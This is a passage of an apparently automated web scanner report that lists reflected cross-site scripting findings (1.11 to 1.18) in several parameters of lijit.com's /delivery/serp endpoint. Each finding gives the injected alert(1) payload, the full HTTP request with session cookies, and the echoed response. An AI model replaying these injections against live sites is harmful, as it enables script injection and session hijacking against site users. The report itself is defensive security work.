X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Mon, 17 Oct 2011 21:38:38 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18348

var LJT_AdChoices = {
   img1: 'http://www.lijit.com/___leviathan_a18/res/images/adchoices/adChoicesSmall_icon.png',
   img2: 'http://www.lijit.com/___leviathan_a18/res/images/adchoices/adChoicesBig_icon.
...[SNIP]...
t Time String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "buddytv";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "1f5560";alert(1)//dd9ec51666c";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_57615";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);
   
   var lw
...[SNIP]...

1.11. http://www.lijit.com/delivery/serp [ad_hint parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the ad_hint request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd63"%3balert(1)//f6687a8b1ac was submitted in the ad_hint parameter. This input was echoed as 8cd63";alert(1)//f6687a8b1ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=8cd63"%3balert(1)//f6687a8b1ac&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:41 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:41 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15360

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
ethod = "regex";

var processedWideCnt = 0;

if (1 == 1){
   var twoLinePref = true;
} else {
   var twoLinePref = false;
}

//var twoLinePref = false;

function getQuery() {
var ad_hint = "8cd63";alert(1)//f6687a8b1ac";
if (ad_hint.length != 0 && ad_hint.indexOf("ad_hint") == -1) {
var hints = ad_hint.split(/\,/);
var date = new Date();
var hint = hints[date.getSeconds() % hints.length];

...[SNIP]...

1.12. http://www.lijit.com/delivery/serp [dne parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the dne request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17543"%3balert(1)//5467fe5844c was submitted in the dne parameter. This input was echoed as 17543";alert(1)//5467fe5844c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit17543"%3balert(1)//5467fe5844c&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:53 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n7 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:53 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15761

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
ideEleBottom.innerHTML = sl_html[1];
sl_html[1] = '';
setTimeout("fixPagWrap()", 0);
}

}


function renderSkyAds() {
var narrowEleName = "blog_lijit_narrow_ad_unit17543";alert(1)//5467fe5844c";
if (narrowEleName.length >
...[SNIP]...

1.13. http://www.lijit.com/delivery/serp [engine parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the engine request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21855'><script>alert(1)</script>c51676f35cc was submitted in the engine parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other21855'><script>alert(1)</script>c51676f35cc&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:33 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:33 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15982

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv&numAds=2 &serp=1&premium=1&engine=other21855'><script>alert(1)</script>c51676f35cc&lijit_kw=xss xss cd fgytr ghjk&cb=1354382281&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520%26ns%3D8%26engine%3Dother21855%27%
...[SNIP]...

1.14. http://www.lijit.com/delivery/serp [engine parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the engine request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c12'%3balert(1)//305f5b6dffc was submitted in the engine parameter. This input was echoed as f9c12';alert(1)//305f5b6dffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=otherf9c12'%3balert(1)//305f5b6dffc&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:34 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:35 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15846

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<scr' + 'ipt src="' + 'http://ap.lijit.com///www/delivery/ajs.php?zoneid=28664&username=buddytv&numAds=2 &serp=1&premium=1&engine=otherf9c12';alert(1)//305f5b6dffc&lijit_kw=&cb=767660939&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520%26ns%3D8%26engine%3Dotherf9c12%27%253balert%281%29%2F%2F
...[SNIP]...

1.15. http://www.lijit.com/delivery/serp [nt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the nt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 40532%3balert(1)//c8b04fdbddd was submitted in the nt parameter. This input was echoed as 40532;alert(1)//c8b04fdbddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%2040532%3balert(1)//c8b04fdbddd&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:12 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n4), ms sea-ag1-n4 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:12 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15829

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
pt = true;
var textAdNoAdsZoneId = 28664;
var skyscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 51423;
var textAdBottomZoneId = 51735;
var skyCnt=0;

var textAdCnt=2 40532;alert(1)//c8b04fdbddd;


var zone51423Delivered = false;


var zone51735Delivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoogleAds = 0;
var numSkyGoogleAds = 0;

//deprecated for new z
...[SNIP]...

1.16. http://www.lijit.com/delivery/serp [nt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the nt request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9bdd'><script>alert(1)</script>ee611d7da11 was submitted in the nt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20d9bdd'><script>alert(1)</script>ee611d7da11&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:09 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:10 GMT
Age: 0
Content-Length: 15981
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv&numAds=2 d9bdd'><script>alert(1)</script>ee611d7da11&serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1513582916&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520d9bdd
...[SNIP]...

1.17. http://www.lijit.com/delivery/serp [nt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the nt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 798f9'-alert(1)-'735a329a831 was submitted in the nt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20798f9'-alert(1)-'735a329a831&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:42:11 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n9), ms sea-ag1-n9 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:42:12 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15822

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<scr' + 'ipt src="' + 'http://ap.lijit.com///www/delivery/ajs.php?zoneid=28664&username=buddytv&numAds=2 798f9'-alert(1)-'735a329a831&serp=1&premium=1&engine=other&lijit_kw=&cb=183282488&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520798f9%27-alert%281%29-%2773
...[SNIP]...

1.18. http://www.lijit.com/delivery/serp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9aac6'><script>alert(1)</script>a426f58dd95 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk9aac6'><script>alert(1)</script>a426f58dd95&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
